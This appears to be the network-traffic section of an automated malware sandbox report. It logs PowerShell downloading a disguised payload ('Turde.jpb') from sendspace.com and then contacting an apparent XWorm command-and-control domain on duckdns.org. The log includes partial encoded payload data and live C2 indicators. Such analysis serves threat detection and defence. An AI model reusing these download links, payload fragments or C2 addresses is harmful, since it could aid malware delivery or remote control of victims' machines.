                                                                          May 23, 2024 18:25:22.344064951 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.344089031 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.404494047 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.404515982 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.404578924 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.404594898 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.404618979 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.404637098 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.407113075 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.407135963 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.407196045 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.407201052 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.407254934 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.410924911 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.410948038 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.410996914 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.411003113 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.411020994 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.411047935 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.413361073 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.413382053 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.413433075 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.413440943 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.413460970 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.413480043 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.415895939 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.415916920 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.415982008 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.415990114 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.416307926 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.418698072 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.418720007 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.418795109 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.418803930 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.418838978 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.426506042 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.426527977 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.426592112 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.426606894 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.426641941 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.429491997 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.429523945 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.429579973 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.429588079 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.429641008 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.532207012 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.532228947 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.532288074 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.532315969 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.532356024 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.532378912 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.535248041 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.535268068 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.535320997 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.535327911 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.535348892 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.535375118 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.537978888 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.537998915 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.538064957 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.538072109 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.538113117 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.540514946 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.540534973 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.540577888 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.540597916 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.540602922 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.540651083 CEST4434970869.31.136.17192.168.2.8
                                                                          May 23, 2024 18:25:22.540657043 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.540657043 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.540847063 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:22.541157007 CEST49708443192.168.2.869.31.136.17
                                                                          May 23, 2024 18:25:57.888526917 CEST49710443192.168.2.8172.67.170.105
                                                                          May 23, 2024 18:25:57.888576031 CEST44349710172.67.170.105192.168.2.8
                                                                          May 23, 2024 18:25:57.888653994 CEST49710443192.168.2.8172.67.170.105
                                                                          May 23, 2024 18:25:57.909389973 CEST49710443192.168.2.8172.67.170.105
                                                                          May 23, 2024 18:25:57.909426928 CEST44349710172.67.170.105192.168.2.8
                                                                          May 23, 2024 18:25:58.407843113 CEST44349710172.67.170.105192.168.2.8
                                                                          May 23, 2024 18:25:58.407960892 CEST49710443192.168.2.8172.67.170.105
                                                                          May 23, 2024 18:25:58.535604954 CEST49710443192.168.2.8172.67.170.105
                                                                          May 23, 2024 18:25:58.535629034 CEST44349710172.67.170.105192.168.2.8
                                                                          May 23, 2024 18:25:58.535964012 CEST44349710172.67.170.105192.168.2.8
                                                                          May 23, 2024 18:25:58.536046028 CEST49710443192.168.2.8172.67.170.105
                                                                          May 23, 2024 18:25:58.603640079 CEST49710443192.168.2.8172.67.170.105
                                                                          May 23, 2024 18:25:58.646523952 CEST44349710172.67.170.105192.168.2.8
                                                                          May 23, 2024 18:25:59.261753082 CEST44349710172.67.170.105192.168.2.8
                                                                          May 23, 2024 18:25:59.261820078 CEST44349710172.67.170.105192.168.2.8
                                                                          May 23, 2024 18:25:59.262005091 CEST49710443192.168.2.8172.67.170.105
                                                                          May 23, 2024 18:25:59.269133091 CEST49710443192.168.2.8172.67.170.105
                                                                          May 23, 2024 18:25:59.269155025 CEST44349710172.67.170.105192.168.2.8
                                                                          May 23, 2024 18:25:59.336745977 CEST49711443192.168.2.869.31.136.57
                                                                          May 23, 2024 18:25:59.336791039 CEST4434971169.31.136.57192.168.2.8
                                                                          May 23, 2024 18:25:59.336869001 CEST49711443192.168.2.869.31.136.57
                                                                          May 23, 2024 18:25:59.337790966 CEST49711443192.168.2.869.31.136.57
                                                                          May 23, 2024 18:25:59.337804079 CEST4434971169.31.136.57192.168.2.8
                                                                          May 23, 2024 18:26:00.298897982 CEST4434971169.31.136.57192.168.2.8
                                                                          May 23, 2024 18:26:00.298998117 CEST49711443192.168.2.869.31.136.57
                                                                          May 23, 2024 18:26:00.303100109 CEST49711443192.168.2.869.31.136.57
                                                                          May 23, 2024 18:26:00.303107977 CEST4434971169.31.136.57192.168.2.8
                                                                          May 23, 2024 18:26:00.303349018 CEST4434971169.31.136.57192.168.2.8
                                                                          May 23, 2024 18:26:00.303514004 CEST49711443192.168.2.869.31.136.57
                                                                          May 23, 2024 18:26:00.305002928 CEST49711443192.168.2.869.31.136.57
                                                                          May 23, 2024 18:26:00.346503019 CEST4434971169.31.136.57192.168.2.8
                                                                          May 23, 2024 18:26:00.670762062 CEST4434971169.31.136.57192.168.2.8
                                                                          May 23, 2024 18:26:00.670794010 CEST4434971169.31.136.57192.168.2.8
                                                                          May 23, 2024 18:26:00.670810938 CEST4434971169.31.136.57192.168.2.8
                                                                          May 23, 2024 18:26:00.670903921 CEST49711443192.168.2.869.31.136.57
                                                                          May 23, 2024 18:26:00.670928001 CEST49711443192.168.2.869.31.136.57
                                                                          May 23, 2024 18:26:00.670936108 CEST4434971169.31.136.57192.168.2.8
                                                                          May 23, 2024 18:26:00.670991898 CEST49711443192.168.2.869.31.136.57
                                                                          May 23, 2024 18:26:00.682717085 CEST4434971169.31.136.57192.168.2.8
                                                                          May 23, 2024 18:26:00.682742119 CEST4434971169.31.136.57192.168.2.8
                                                                          May 23, 2024 18:26:00.682801962 CEST49711443192.168.2.869.31.136.57
                                                                          May 23, 2024 18:26:00.682807922 CEST4434971169.31.136.57192.168.2.8
                                                                          May 23, 2024 18:26:00.682833910 CEST49711443192.168.2.869.31.136.57
                                                                          May 23, 2024 18:26:00.682849884 CEST49711443192.168.2.869.31.136.57
                                                                          May 23, 2024 18:26:00.704879045 CEST4434971169.31.136.57192.168.2.8
                                                                          May 23, 2024 18:26:00.704951048 CEST4434971169.31.136.57192.168.2.8
                                                                          May 23, 2024 18:26:00.705046892 CEST49711443192.168.2.869.31.136.57
                                                                          May 23, 2024 18:26:00.707371950 CEST49711443192.168.2.869.31.136.57
                                                                          May 23, 2024 18:26:00.707395077 CEST4434971169.31.136.57192.168.2.8
                                                                          May 23, 2024 18:26:00.707405090 CEST49711443192.168.2.869.31.136.57
                                                                          May 23, 2024 18:26:00.707444906 CEST49711443192.168.2.869.31.136.57
                                                                          May 23, 2024 18:26:04.232777119 CEST497138896192.168.2.857.128.155.22
                                                                          May 23, 2024 18:26:04.247432947 CEST88964971357.128.155.22192.168.2.8
                                                                          May 23, 2024 18:26:04.247503042 CEST497138896192.168.2.857.128.155.22
                                                                          May 23, 2024 18:26:04.495383024 CEST497138896192.168.2.857.128.155.22
                                                                          May 23, 2024 18:26:04.502902031 CEST88964971357.128.155.22192.168.2.8
                                                                          May 23, 2024 18:26:16.229141951 CEST497138896192.168.2.857.128.155.22
                                                                          May 23, 2024 18:26:16.251004934 CEST88964971357.128.155.22192.168.2.8
                                                                          May 23, 2024 18:26:16.407726049 CEST88964971357.128.155.22192.168.2.8
                                                                          May 23, 2024 18:26:16.461158037 CEST497138896192.168.2.857.128.155.22
                                                                          May 23, 2024 18:26:16.657345057 CEST497138896192.168.2.857.128.155.22
                                                                          May 23, 2024 18:26:16.667587042 CEST88964971357.128.155.22192.168.2.8
                                                                          May 23, 2024 18:26:27.961745024 CEST497138896192.168.2.857.128.155.22
                                                                          May 23, 2024 18:26:27.973071098 CEST88964971357.128.155.22192.168.2.8
                                                                          May 23, 2024 18:26:28.387391090 CEST88964971357.128.155.22192.168.2.8
                                                                          May 23, 2024 18:26:28.389121056 CEST497138896192.168.2.857.128.155.22
                                                                          May 23, 2024 18:26:28.396287918 CEST88964971357.128.155.22192.168.2.8
                                                                          May 23, 2024 18:26:30.535367966 CEST88964971357.128.155.22192.168.2.8
                                                                          May 23, 2024 18:26:30.586297035 CEST497138896192.168.2.857.128.155.22
                                                                          May 23, 2024 18:26:39.696305990 CEST497138896192.168.2.857.128.155.22
                                                                          May 23, 2024 18:26:39.702241898 CEST88964971357.128.155.22192.168.2.8
                                                                          May 23, 2024 18:26:39.874455929 CEST88964971357.128.155.22192.168.2.8
                                                                          May 23, 2024 18:26:39.894593954 CEST497138896192.168.2.857.128.155.22
                                                                          May 23, 2024 18:26:39.947184086 CEST88964971357.128.155.22192.168.2.8
                                                                          May 23, 2024 18:26:51.430519104 CEST497138896192.168.2.857.128.155.22
                                                                          May 23, 2024 18:26:51.471260071 CEST88964971357.128.155.22192.168.2.8
                                                                          May 23, 2024 18:26:51.632980108 CEST88964971357.128.155.22192.168.2.8
                                                                          May 23, 2024 18:26:51.634634018 CEST497138896192.168.2.857.128.155.22
                                                                          May 23, 2024 18:26:51.639571905 CEST88964971357.128.155.22192.168.2.8
                                                                          May 23, 2024 18:27:00.510390997 CEST88964971357.128.155.22192.168.2.8
                                                                          May 23, 2024 18:27:00.558275938 CEST497138896192.168.2.857.128.155.22
                                                                          May 23, 2024 18:27:03.165122032 CEST497138896192.168.2.857.128.155.22
                                                                          May 23, 2024 18:27:03.259651899 CEST88964971357.128.155.22192.168.2.8
                                                                          May 23, 2024 18:27:03.377198935 CEST88964971357.128.155.22192.168.2.8
                                                                          May 23, 2024 18:27:03.379185915 CEST497138896192.168.2.857.128.155.22
                                                                          May 23, 2024 18:27:03.384155989 CEST88964971357.128.155.22192.168.2.8
                                                                          May 23, 2024 18:27:11.946603060 CEST497138896192.168.2.857.128.155.22
                                                                          May 23, 2024 18:27:11.951661110 CEST88964971357.128.155.22192.168.2.8
                                                                          May 23, 2024 18:27:12.112824917 CEST88964971357.128.155.22192.168.2.8
                                                                          May 23, 2024 18:27:12.114608049 CEST497138896192.168.2.857.128.155.22
                                                                          May 23, 2024 18:27:12.120599985 CEST88964971357.128.155.22192.168.2.8
                                                                          May 23, 2024 18:27:15.087392092 CEST497138896192.168.2.857.128.155.22
                                                                          May 23, 2024 18:27:15.095944881 CEST88964971357.128.155.22192.168.2.8
                                                                          May 23, 2024 18:27:15.263195038 CEST88964971357.128.155.22192.168.2.8
                                                                          May 23, 2024 18:27:15.305429935 CEST497138896192.168.2.857.128.155.22
                                                                          May 23, 2024 18:27:15.310631990 CEST88964971357.128.155.22192.168.2.8

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          May 23, 2024 18:25:12.452984095 CEST5079153192.168.2.81.1.1.1
                                                                          May 23, 2024 18:25:12.465846062 CEST53507911.1.1.1192.168.2.8
                                                                          May 23, 2024 18:25:13.728193045 CEST5535053192.168.2.81.1.1.1
                                                                          May 23, 2024 18:25:13.779443026 CEST53553501.1.1.1192.168.2.8
                                                                          May 23, 2024 18:25:20.880211115 CEST6127253192.168.2.81.1.1.1
                                                                          May 23, 2024 18:25:20.939408064 CEST53612721.1.1.1192.168.2.8
                                                                          May 23, 2024 18:25:59.282911062 CEST5504853192.168.2.81.1.1.1
                                                                          May 23, 2024 18:25:59.335450888 CEST53550481.1.1.1192.168.2.8
                                                                          May 23, 2024 18:26:04.086932898 CEST5676453192.168.2.81.1.1.1
                                                                          May 23, 2024 18:26:04.211739063 CEST53567641.1.1.1192.168.2.8

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          May 23, 2024 18:25:12.452984095 CEST192.168.2.81.1.1.10xe2e5Standard query (0)www.sendspace.comA (IP address)IN (0x0001)false
                                                                          May 23, 2024 18:25:13.728193045 CEST192.168.2.81.1.1.10xc761Standard query (0)fs03n3.sendspace.comA (IP address)IN (0x0001)false
                                                                          May 23, 2024 18:25:20.880211115 CEST192.168.2.81.1.1.10xe42eStandard query (0)fs03n5.sendspace.comA (IP address)IN (0x0001)false
                                                                          May 23, 2024 18:25:59.282911062 CEST192.168.2.81.1.1.10x250dStandard query (0)fs13n3.sendspace.comA (IP address)IN (0x0001)false
                                                                          May 23, 2024 18:26:04.086932898 CEST192.168.2.81.1.1.10x27bStandard query (0)xwormmom53.duckdns.orgA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          May 23, 2024 18:25:12.465846062 CEST1.1.1.1192.168.2.80xe2e5No error (0)www.sendspace.com172.67.170.105A (IP address)IN (0x0001)false
                                                                          May 23, 2024 18:25:12.465846062 CEST1.1.1.1192.168.2.80xe2e5No error (0)www.sendspace.com104.21.28.80A (IP address)IN (0x0001)false
                                                                          May 23, 2024 18:25:13.779443026 CEST1.1.1.1192.168.2.80xc761No error (0)fs03n3.sendspace.com69.31.136.17A (IP address)IN (0x0001)false
                                                                          May 23, 2024 18:25:20.939408064 CEST1.1.1.1192.168.2.80xe42eNo error (0)fs03n5.sendspace.com69.31.136.17A (IP address)IN (0x0001)false
                                                                          May 23, 2024 18:25:59.335450888 CEST1.1.1.1192.168.2.80x250dNo error (0)fs13n3.sendspace.com69.31.136.57A (IP address)IN (0x0001)false
                                                                          May 23, 2024 18:26:04.211739063 CEST1.1.1.1192.168.2.80x27bNo error (0)xwormmom53.duckdns.org57.128.155.22A (IP address)IN (0x0001)false

                                                                          HTTP Request Dependency Graph

                                                                          • www.sendspace.com
                                                                          • fs03n5.sendspace.com
                                                                          • fs13n3.sendspace.com

                                                                          HTTPS Proxied Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.849705172.67.170.1054437772C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-23 16:25:13 UTC174OUTGET /pro/dl/ppxodm HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: www.sendspace.com
                                                                          Connection: Keep-Alive
                                                                          2024-05-23 16:25:13 UTC941INHTTP/1.1 301 Moved Permanently
                                                                          Date: Thu, 23 May 2024 16:25:13 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: SID=rde69ovlma2k548ssmdubg7264; path=/; domain=.sendspace.com
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Pragma: no-cache
                                                                          Location: https://fs03n3.sendspace.com/dlpro/4b26f029f512f90f3568c85b6d26623d/664f6de9/ppxodm/Turde.jpb
                                                                          Vary: Accept-Encoding
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TN9iWXRW8wZaOu92Yv%2BUd%2BVZgzjWfpqVkS%2F7bkcmuJGcdfu8jo832SIoJHXVn52hhbyk5s3xTBSsOJ5XhtnzLQUPFhLu4EwW%2BR%2BNVM%2B7mBsMMkrKEvUqZhqkovJToryuRNDZdg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 88866691289b43f7-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-05-23 16:25:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.849706172.67.170.1054437772C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-23 16:25:20 UTC56OUTGET /pro/dl/ppxodm HTTP/1.1
                                                                          Host: www.sendspace.com
                                                                          2024-05-23 16:25:20 UTC939INHTTP/1.1 301 Moved Permanently
                                                                          Date: Thu, 23 May 2024 16:25:20 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: SID=to4rj7546u211tqq366uasgqk3; path=/; domain=.sendspace.com
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Pragma: no-cache
                                                                          Location: https://fs03n5.sendspace.com/dlpro/ab0d4132c177b6677608eb6f24e68e83/664f6df0/ppxodm/Turde.jpb
                                                                          Vary: Accept-Encoding
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7k%2BAZFU6QAh%2BfnFhb6sq9Jgm%2FLUpdoEC4StnvReTzPyPX4rClIwj4rI2k5lpGIEAyb77Vi0%2FwI3woBPJhUoCnZeqKwaoaEGrCnQ4SDrwaGV8i57sMM150Q7gNdzjUVmdmm%2Fpsw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 888666be9aa9c461-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-05-23 16:25:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.84970869.31.136.174437772C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-23 16:25:21 UTC134OUTGET /dlpro/ab0d4132c177b6677608eb6f24e68e83/664f6df0/ppxodm/Turde.jpb HTTP/1.1
                                                                          Host: fs03n5.sendspace.com
                                                                          Connection: Keep-Alive
                                                                          2024-05-23 16:25:22 UTC494INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Thu, 23 May 2024 16:25:22 GMT
                                                                          Content-Type: application/octet-stream
                                                                          Content-Length: 494268
                                                                          Last-Modified: Tue, 21 May 2024 02:54:01 GMT
                                                                          Connection: close
                                                                          Set-Cookie: SID=ddiu0f8506mq21uv00g5sn1dc0; path=/; domain=.sendspace.com
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Content-Disposition: attachment;filename="Turde.jpb"
                                                                          ETag: "664c0cc9-78abc"
                                                                          Accept-Ranges: bytes
                                                                          2024-05-23 16:25:22 UTC15890INData Raw: 36 77 49 54 30 6e 45 42 6d 37 75 56 63 42 77 41 63 51 47 62 36 77 4c 30 6c 51 4e 63 4a 41 52 78 41 5a 76 72 41 71 66 32 75 63 38 71 54 7a 78 78 41 5a 76 72 41 6b 4a 6b 67 63 47 78 31 54 49 4b 36 77 4a 46 37 75 73 43 59 57 71 42 38 59 41 41 67 6b 5a 78 41 5a 74 78 41 5a 76 72 41 6f 41 71 36 77 4a 72 30 4c 71 6a 63 6b 35 51 63 51 47 62 63 51 47 62 36 77 4c 77 42 33 45 42 6d 7a 48 4b 36 77 4b 7a 75 65 73 43 5a 4a 6d 4a 46 41 76 72 41 76 35 45 36 77 4c 79 63 74 48 69 63 51 47 62 36 77 4b 30 53 49 50 42 42 48 45 42 6d 33 45 42 6d 34 48 35 4b 39 4a 2b 41 6e 7a 4b 36 77 4a 65 42 4f 73 43 6f 34 2b 4c 52 43 51 45 36 77 4a 48 78 48 45 42 6d 34 6e 44 36 77 4b 72 6d 6e 45 42 6d 34 48 44 38 77 43 33 41 58 45 42 6d 2b 73 43 79 44 2b 36 6a 43 6d 35 63 58 45 42 6d 2b 73
                                                                          Data Ascii: 6wIT0nEBm7uVcBwAcQGb6wL0lQNcJARxAZvrAqf2uc8qTzxxAZvrAkJkgcGx1TIK6wJF7usCYWqB8YAAgkZxAZtxAZvrAoAq6wJr0Lqjck5QcQGbcQGb6wLwB3EBmzHK6wKzuesCZJmJFAvrAv5E6wLyctHicQGb6wK0SIPBBHEBm3EBm4H5K9J+AnzK6wJeBOsCo4+LRCQE6wJHxHEBm4nD6wKrmnEBm4HD8wC3AXEBm+sCyD+6jCm5cXEBm+s
                                                                          2024-05-23 16:25:22 UTC16384INData Raw: 38 6b 4c 38 6f 5a 54 53 64 45 44 63 6a 6a 42 38 7a 6f 41 48 43 42 59 4c 4a 30 4d 75 39 43 41 62 66 48 33 30 66 47 4f 4a 6c 4f 74 66 46 69 45 57 4a 74 78 52 74 54 6f 78 47 70 36 4c 39 38 77 36 59 32 76 34 74 6c 7a 44 78 4f 78 71 56 71 73 75 36 72 66 64 51 66 41 34 6f 5a 74 4d 69 36 44 54 46 73 72 36 7a 44 66 65 57 70 4c 52 32 39 70 64 2f 44 36 56 70 35 64 75 48 43 65 35 4f 6f 77 4d 64 57 47 43 71 74 62 69 67 38 45 75 39 6e 72 55 79 2b 32 32 62 65 78 2b 4f 38 61 4e 49 5a 39 6a 36 4c 6b 6b 75 34 4d 63 49 57 6f 53 63 54 75 43 44 5a 41 79 42 71 65 58 4a 49 52 72 63 54 75 49 54 67 35 4c 42 69 6b 52 50 53 5a 32 47 72 54 36 57 56 58 72 71 6c 31 6b 78 52 61 69 58 31 30 70 38 30 58 43 2f 43 51 6a 41 38 37 66 31 74 43 33 2b 4c 39 53 4a 54 47 4c 53 69 76 41 76 58 6a
                                                                          Data Ascii: 8kL8oZTSdEDcjjB8zoAHCBYLJ0Mu9CAbfH30fGOJlOtfFiEWJtxRtToxGp6L98w6Y2v4tlzDxOxqVqsu6rfdQfA4oZtMi6DTFsr6zDfeWpLR29pd/D6Vp5duHCe5OowMdWGCqtbig8Eu9nrUy+22bex+O8aNIZ9j6Lkku4McIWoScTuCDZAyBqeXJIRrcTuITg5LBikRPSZ2GrT6WVXrql1kxRaiX10p80XC/CQjA87f1tC3+L9SJTGLSivAvXj
                                                                          2024-05-23 16:25:22 UTC16384INData Raw: 32 7a 61 6a 6e 49 4e 2b 4c 48 48 34 57 55 39 38 62 41 6f 68 6b 39 78 4b 33 77 39 51 49 30 57 39 64 2f 58 71 46 32 78 35 30 66 41 45 37 36 5a 38 6e 73 77 42 56 36 31 49 4d 63 52 6b 73 6a 48 75 48 39 51 52 31 65 6f 42 61 41 74 65 77 58 6b 62 41 4c 56 62 54 72 69 70 4c 43 64 74 2b 51 53 2b 74 47 45 61 7a 50 77 52 54 79 65 63 58 72 6c 47 42 4a 37 4c 36 61 43 77 74 37 4b 4c 54 56 2b 55 46 45 45 70 5a 72 73 65 5a 70 47 64 76 79 4f 37 6a 58 47 37 41 6e 4b 61 71 38 39 54 69 72 75 4a 56 46 73 6b 42 39 65 77 47 6d 6a 65 6b 57 64 65 69 57 34 5a 74 41 56 6a 54 6a 37 39 34 68 72 6e 66 48 35 42 67 6e 7a 67 4a 4e 57 52 52 55 36 36 47 33 65 42 46 6b 6b 31 67 66 7a 47 45 4a 4f 39 66 75 68 39 59 4b 33 61 48 4c 45 44 30 79 4a 65 51 61 36 68 75 30 53 59 31 56 61 38 4b 69 34
                                                                          Data Ascii: 2zajnIN+LHH4WU98bAohk9xK3w9QI0W9d/XqF2x50fAE76Z8nswBV61IMcRksjHuH9QR1eoBaAtewXkbALVbTripLCdt+QS+tGEazPwRTyecXrlGBJ7L6aCwt7KLTV+UFEEpZrseZpGdvyO7jXG7AnKaq89TiruJVFskB9ewGmjekWdeiW4ZtAVjTj794hrnfH5BgnzgJNWRRU66G3eBFkk1gfzGEJO9fuh9YK3aHLED0yJeQa6hu0SY1Va8Ki4
                                                                          2024-05-23 16:25:22 UTC16384INData Raw: 32 4d 38 72 5a 54 50 70 72 34 4a 74 31 6f 72 39 79 6b 4c 47 41 72 6b 46 2b 48 67 41 35 5a 45 52 31 49 79 78 4a 71 76 72 5a 67 37 77 56 70 68 35 38 6a 61 6a 4d 67 72 66 64 54 49 4f 6a 55 6b 48 63 74 65 4c 30 54 65 72 52 69 36 49 74 52 6a 70 49 31 58 47 34 54 2b 58 74 38 33 50 61 65 7a 64 78 33 4d 68 38 6e 56 59 71 51 72 30 53 68 66 77 6e 48 51 32 34 79 64 4c 43 6e 5a 6b 68 42 74 42 4d 35 2f 4a 52 77 62 78 53 43 78 33 72 70 63 65 67 52 35 4d 72 66 72 68 6a 32 6c 51 7a 46 39 4a 70 6c 5a 37 68 71 66 55 37 6e 4a 6f 34 54 76 4f 58 72 52 4d 35 71 54 64 32 6e 34 78 30 54 76 42 6d 46 5a 55 4b 39 46 68 75 74 34 72 51 50 4c 57 35 43 37 46 51 33 49 63 53 51 58 33 68 56 69 6a 39 4d 49 65 5a 66 67 67 6c 37 4f 47 56 4b 36 79 45 64 56 38 79 50 34 6e 72 64 4f 37 63 6d 36
                                                                          Data Ascii: 2M8rZTPpr4Jt1or9ykLGArkF+HgA5ZER1IyxJqvrZg7wVph58jajMgrfdTIOjUkHcteL0TerRi6ItRjpI1XG4T+Xt83Paezdx3Mh8nVYqQr0ShfwnHQ24ydLCnZkhBtBM5/JRwbxSCx3rpcegR5Mrfrhj2lQzF9JplZ7hqfU7nJo4TvOXrRM5qTd2n4x0TvBmFZUK9Fhut4rQPLW5C7FQ3IcSQX3hVij9MIeZfggl7OGVK6yEdV8yP4nrdO7cm6
